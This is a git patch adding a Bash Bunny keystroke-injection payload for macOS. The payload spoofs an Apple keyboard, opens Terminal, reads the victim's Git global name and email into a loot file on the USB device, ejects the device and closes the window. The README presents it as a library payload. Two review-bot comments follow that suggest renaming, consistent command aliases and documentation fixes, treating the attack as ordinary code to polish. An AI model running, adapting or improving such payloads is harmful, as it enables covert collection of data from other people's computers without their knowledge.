From 5cfae30936462e81e678ec4f6d83acb6a883e464 Mon Sep 17 00:00:00 2001 From: quentinlamamy Date: Sun, 20 Aug 2023 12:06:24 +0200 Subject: [PATCH] Add github information exfiltration payload --- .../exfiltration/githubExfiltration/README.md | 30 ++++++++++ .../githubExfiltration/payload.txt | 58 +++++++++++++++++++ 2 files changed, 88 insertions(+) create mode 100644 payloads/library/exfiltration/githubExfiltration/README.md create mode 100755 payloads/library/exfiltration/githubExfiltration/payload.txt diff --git a/payloads/library/exfiltration/githubExfiltration/README.md b/payloads/library/exfiltration/githubExfiltration/README.md new file mode 100644 index 00000000..63162238 --- /dev/null +++ b/payloads/library/exfiltration/githubExfiltration/README.md @@ -0,0 +1,30 @@ +
+ +# Github Information Exfiltration +**Get Git user name and email from the Git global config and exfiltrate them** + +![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white) +![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white) + +![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black) + +
+ +banner + +# Dependency + +* OSX Extension by quentin_lamamy + +# Changelog +v1.0 : +* :tada: Release on 2023/08/20 + +# Contributing +A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues) + +# License +

Github Infos Exfiltration Payload by Quentin Lamamy is licensed under CC BY-NC-SA 4.0

+ +# Support +Buy Me A Coffee diff --git a/payloads/library/exfiltration/githubExfiltration/payload.txt b/payloads/library/exfiltration/githubExfiltration/payload.txt new file mode 100755 index 00000000..bce2553e --- /dev/null +++ b/payloads/library/exfiltration/githubExfiltration/payload.txt @@ -0,0 +1,58 @@ +#!/bin/bash +# +# Title: OSX Payload to exfiltrate Git user name and email +# Description: Get Git user name and email from the Git global config and exfiltrate them +# Author: quentin_lamamy +# Version: 1.0 +# Category: Exfiltration +# Attackmodes: HID STORAGE +# Target OS: OSX +# Dependency: OSX Extensions +# +# Magenta solid Setup +# Yellow single blink Attack in progress +# Yellow double blink Sync +# Yellow triple blink Cleanup +# Green blink then solid Finished + +LED SETUP + +ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250 + +OSX TERMINAL OPEN + +Q STRING 'last_mounted_volume=$(ls -t /Volumes | head -n 1)' +Q ENTER +Q STRING 'lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt' +Q ENTER +Q STRING 'touch $lootPath' +Q ENTER + +LED ATTACK + +# Get the user name from the Git global config +Q STRING 'user_name=$(git config --global user.name)' +Q ENTER + +# Get the user email from the Git global config +Q STRING 'user_email=$(git config --global user.email)' +Q ENTER + +Q STRING 'echo -e "Username: $user_name\nMail: $user_email" > $lootPath' +Q ENTER + +# Sync +LED STAGE 2 +sync + +# Cleanup +LED STAGE 3 + +# Eject +QUACK STRING 'diskutil eject $last_mounted_volume' +QUACK ENTER +DELAY 100 + +OSX TERMINAL CLOSE + +LED FINISH \ No newline at end of file
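Review bot: The README title "Github Information Exfiltration" (and the commit subject) does not match what the payload collects: the only data read is `user.name` and `user.email` from the local Git global configuration via `git config --global`, which is Git, not GitHub, and involves no GitHub account, token or API. Rename the payload to "Git ..." or state in the bold description line exactly which two values are read and where they are written (`loot/gitInfos.txt` on the storage partition), so a reader reviewing the library knows the scope without opening payload.txt. Also unify the dependency naming between the two files: the README's "Dependency" section says "OSX Extension by quentin_lamamy" while payload.txt's header says "Dependency: OSX Extensions". Minor wording in the Contributing section: "A bug ? An idea of feature ? [Fill an issue on github]" should read "A bug? A feature idea? [File an issue on GitHub]".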
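Review bot: Mixed aliases for the same command: the body uses `Q STRING` / `Q ENTER` throughout, then switches to `QUACK STRING 'diskutil eject $last_mounted_volume'` / `QUACK ENTER` in the Eject step; pick one form for the whole file. Two assumptions in the first Terminal block are undocumented in the header: `last_mounted_volume=$(ls -t /Volumes | head -n 1)` takes the most recently listed entry in /Volumes to be the Bunny's storage volume, and `lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt` assumes a `loot/` directory already exists there; state both in the header comments next to "Dependency" so the behaviour is clear to anyone reading or analysing the payload. The `touch $lootPath` line is redundant, since the later `echo -e ... > $lootPath` creates the file. The LED comments in the header ("Yellow double blink Sync", "Yellow triple blink Cleanup") should name the exact commands used below (`LED STAGE 2`, `LED STAGE 3`) so comment and code can be checked against each other. Finally, the file ends with `LED FINISH` and no trailing newline; add one.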